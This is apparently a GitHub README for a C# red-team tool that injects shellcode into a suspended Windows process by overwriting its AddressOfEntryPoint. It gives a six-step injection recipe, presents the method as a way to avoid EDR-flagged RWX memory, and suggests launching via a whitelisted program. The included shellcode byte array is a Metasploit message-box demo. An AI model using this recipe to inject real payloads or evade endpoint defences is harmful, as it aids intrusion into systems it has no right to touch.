Skip to content

Kara-4search/AddressOfEntryPoint_Hijack_CSharp

Repository files navigation

AddressOfEntryPoint_Hijack_CSharp

Blog link: not gonna update

  • Shellcode injection or execution via AddressOfEntryPoint hijack.

  • Base on my other projects down below:

    1. MappingInjection
    2. HookDetection
    3. PEB-PPIDspoofing
  • Tested on Win10/x64

  • Steps

    1. Create a process in a suspended status with "CreateProcess".
    2. Finding process's PEB address.
    3. Finding the process's "ImageBase_address" via PEB.
    4. Finding the RVA(AddressOfEntryPoint) via ImageBase_address(Function: Locate_AddressOfEntryPoint).
    5. AddressOfEntryPoint_address = ImageBase_address + RVA.
    6. Write your shellcode(buf1) into AddressOfEntryPoint_address with "WriteProcessMemory".
  • **NOTE: If you use NtWriteVirtualMemory insteal of WriteProcessMemory, you gonna get an error.if you really want to use NtWriteVirtualMemory, you may need to change the protect status of the page.

  • In this technique we don't need to allocate RWX memory pages in the victim process which some EDRs may not like.

  • buf1 down below is a messagebox.

	/* MessageBox */
	byte[] buf1 = new byte[323] {
		0xfc,0x48,0x81,0xe4,0xf0,0xff,0xff,0xff,0xe8,0xd0,0x00,0x00,0x00,0x41,0x51,
		0x41,0x50,0x52,0x51,0x56,0x48,0x31,0xd2,0x65,0x48,0x8b,0x52,0x60,0x3e,0x48,
		0x8b,0x52,0x18,0x3e,0x48,0x8b,0x52,0x20,0x3e,0x48,0x8b,0x72,0x50,0x3e,0x48,
		0x0f,0xb7,0x4a,0x4a,0x4d,0x31,0xc9,0x48,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x02,
		0x2c,0x20,0x41,0xc1,0xc9,0x0d,0x41,0x01,0xc1,0xe2,0xed,0x52,0x41,0x51,0x3e,
		0x48,0x8b,0x52,0x20,0x3e,0x8b,0x42,0x3c,0x48,0x01,0xd0,0x3e,0x8b,0x80,0x88,
		0x00,0x00,0x00,0x48,0x85,0xc0,0x74,0x6f,0x48,0x01,0xd0,0x50,0x3e,0x8b,0x48,
		0x18,0x3e,0x44,0x8b,0x40,0x20,0x49,0x01,0xd0,0xe3,0x5c,0x48,0xff,0xc9,0x3e,
		0x41,0x8b,0x34,0x88,0x48,0x01,0xd6,0x4d,0x31,0xc9,0x48,0x31,0xc0,0xac,0x41,
		0xc1,0xc9,0x0d,0x41,0x01,0xc1,0x38,0xe0,0x75,0xf1,0x3e,0x4c,0x03,0x4c,0x24,
		0x08,0x45,0x39,0xd1,0x75,0xd6,0x58,0x3e,0x44,0x8b,0x40,0x24,0x49,0x01,0xd0,
		0x66,0x3e,0x41,0x8b,0x0c,0x48,0x3e,0x44,0x8b,0x40,0x1c,0x49,0x01,0xd0,0x3e,
		0x41,0x8b,0x04,0x88,0x48,0x01,0xd0,0x41,0x58,0x41,0x58,0x5e,0x59,0x5a,0x41,
		0x58,0x41,0x59,0x41,0x5a,0x48,0x83,0xec,0x20,0x41,0x52,0xff,0xe0,0x58,0x41,
		0x59,0x5a,0x3e,0x48,0x8b,0x12,0xe9,0x49,0xff,0xff,0xff,0x5d,0x49,0xc7,0xc1,
		0x00,0x00,0x00,0x00,0x3e,0x48,0x8d,0x95,0x1a,0x01,0x00,0x00,0x3e,0x4c,0x8d,
		0x85,0x2b,0x01,0x00,0x00,0x48,0x31,0xc9,0x41,0xba,0x45,0x83,0x56,0x07,0xff,
		0xd5,0xbb,0xe0,0x1d,0x2a,0x0a,0x41,0xba,0xa6,0x95,0xbd,0x9d,0xff,0xd5,0x48,
		0x83,0xc4,0x28,0x3c,0x06,0x7c,0x0a,0x80,0xfb,0xe0,0x75,0x05,0xbb,0x47,0x13,
		0x72,0x6f,0x6a,0x00,0x59,0x41,0x89,0xda,0xff,0xd5,0x48,0x65,0x6c,0x6c,0x6f,
		0x2c,0x20,0x66,0x72,0x6f,0x6d,0x20,0x4d,0x53,0x46,0x21,0x00,0x4d,0x65,0x73,
		0x73,0x61,0x67,0x65,0x42,0x6f,0x78,0x00 };

Usage

  1. Launch through a white-list application
  • Launch with mspaint avatar
  • details avatar

TO-DO list

  • NONE

Reference link:

  1. https://www.displayfusion.com/Discussions/View/converting-c-data-types-to-c/?ID=38db6001-45e5-41a3-ab39-8004450204b3
  2. http://www.qfrost.com/WindowsKernel/WriteProcessMemory/
  3. https://www.ired.team/offensive-security/code-injection-process-injection/addressofentrypoint-code-injection-without-virtualallocex-rwx

Releases

No releases published

Packages

No packages published

Languages